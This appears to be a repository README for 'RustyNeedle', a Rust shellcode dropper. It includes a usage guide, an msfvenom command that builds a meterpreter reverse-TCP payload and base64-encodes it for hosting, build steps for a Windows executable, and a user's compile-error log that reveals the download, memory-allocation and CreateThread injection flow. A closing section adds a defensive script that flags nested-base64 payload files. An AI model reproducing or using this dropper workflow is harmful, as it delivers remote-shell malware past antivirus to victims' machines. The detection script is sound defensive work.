A Rust-based dropper for shellcode payloads.

Overview

RustyNeedle

THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY. I take no responsibility if you decide to do crimes with this code.

A simple dropper for shellcode that leverages the power of...base64 encoding??

No seriously. And it works. Here's how:

Usage

  1. Create your shellcode however you like, be it with msfvenom or other tools. Export the raw shellcode file.

  2. Use the encode.py script provided in this repository to create an encoded version of the shellcode.

python3 encode.py [SHELLCODE_FILE] [B64_ITERATIONS] [OUT_FILE]

Arguments

  • SHELLCODE_FILE: raw shellcode file to encode
  • B64_ITERATIONS: # of times to base64-encode the shellcode
  • OUT_FILE: Resulting text file of the encoded shellcode. NOTE: this will be many times larger than the source!

Alternative usage

If you don't want to use the script, you can also encode 0x hex values from msfvenom. It would go something like this:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f csharp | tail -n+2 | sed 's/[{}; \n]//g' | base64 -w 0 > note.txt
# Pipe to base64 -w 0 as many times as you want to iterate the encoding

  3. Edit the source code in src/main.rs to reflect the URL where the encoded shellcode will be hosted.

  4. Run cargo build --target x86_64-pc-windows-gnu --release. If building on Linux for Windows, make sure you've added the Windows target triple with rustup target add x86_64-pc-windows-gnu.

  5. Copy the resulting exe in target/x86_64-pc-windows-gnu/release/rustyneedle.exe wherever you like.

  6. Set up any listeners, then execute the dropper!
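
For defenders, the hosted text file this procedure produces has a recognizable shape: every base64 pass grows the data by roughly 4/3, and the innermost layer is either raw bytes or a 0x hex list. The triage sketch below is an added example, not code from the RustyNeedle repository; the function names, the 0.85 printable-text threshold, the two-layer cutoff and the sample bytes are assumptions constructed for illustration.

```python
import base64
import binascii
import re

B64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")
# "0x00,0x01,..." byte list, the shape left by the msfvenom/sed pipeline above
HEX_LIST_RE = re.compile(rb"(?:0x[0-9a-fA-F]{2},?\s*)+")

def peel_base64(blob: bytes, max_layers: int = 32):
    """Strip nested base64 layers; return (layer_count, innermost_bytes)."""
    data, layers = blob, 0
    while layers < max_layers:
        candidate = b"".join(data.split())  # tolerate wrapped lines
        if len(candidate) < 8 or len(candidate) % 4 or not B64_RE.fullmatch(candidate):
            break
        try:
            data = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            break
        layers += 1
    return layers, data

def printable_ratio(data: bytes) -> float:
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / max(len(data), 1)

def triage(blob: bytes, min_layers: int = 2) -> dict:
    """Flag text files that are stacked base64 around non-text content."""
    layers, inner = peel_base64(blob)
    kind = "text"
    if HEX_LIST_RE.fullmatch(inner.strip()):
        kind = "hex-byte-list"
    elif inner and printable_ratio(inner) < 0.85:  # assumed threshold
        kind = "binary"
    return {"layers": layers, "inner_kind": kind,
            "expansion": round(len(blob) / max(len(inner), 1), 2),
            "suspicious": layers >= min_layers and kind != "text"}

def wrap(data: bytes, n: int) -> bytes:
    for _ in range(n):
        data = base64.b64encode(data)
    return data

# Constructed samples: wrap() applies n base64 passes to harmless placeholder bytes.
SAMPLES = {"nested-binary": wrap(bytes(range(256)), 3),
           "nested-hex": wrap(b"0x00,0x01,0x02,\n0x03,0x04", 2),
           "plain-note": b"meeting moved to 3pm\n"}

if __name__ == "__main__":
    print({name: triage(blob) for name, blob in SAMPLES.items()})
```

The layer check is a heuristic: short alphanumeric text whose length is a multiple of four can count as one false layer, which is why a single layer around readable text is not flagged.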


Comments
  • compile problem

    Hey, I'm not sure what's going on here, could you help?

    error: proc macro panicked
      --> src\main.rs:33:1
       |
    33 | use_litcrypt!();
       | ^^^^^^^^^^^^^^^
       |
       = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
      --> src\main.rs:80:35
       |
    80 |                     let err_msg = lc!("Could not convert bytes to string");
       |                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
       |
       = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:103:31
        |
    103 |                 let err_msg = lc!("Could not decode shellcode");
        |                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:112:20
        |
    112 |         return Err(lc!("Could not download shellcode"));
        |                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:133:32
        |
    133 |                 println!("{}", lc!("Couldn't allocate memory to current proc."));
        |                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:135:32
        |
    135 |                 println!("{}", lc!("Allocated memory to current proc."));
        |                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:139:28
        |
    139 |             println!("{}", lc!("Copying Shellcode to address in current proc."));
        |                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:141:28
        |
    141 |             println!("{}", lc!("Copied..."));
        |                            ^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:144:28
        |
    144 |             println!("{}", lc!("Changing mem protections to RX..."));
        |                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:156:39
        |
    156 |                 return println!("{}", lc!("Error during injection"));
        |                                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:160:28
        |
    160 |             println!("{}", lc!("Calling CreateThread..."));
        |                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:175:32
        |
    175 |                 println!("{}", lc!("Error during inject."));
        |                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:181:31
        |
    181 |                println!("{}", lc!("Good!"));
        |                               ^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    error: proc macro panicked
       --> src\main.rs:182:31
        |
    182 |                println!("{}", lc!("Injection completed!"));
        |                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
        |
        = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.
    
    opened by shorefall 3
Owner
Michael Taggart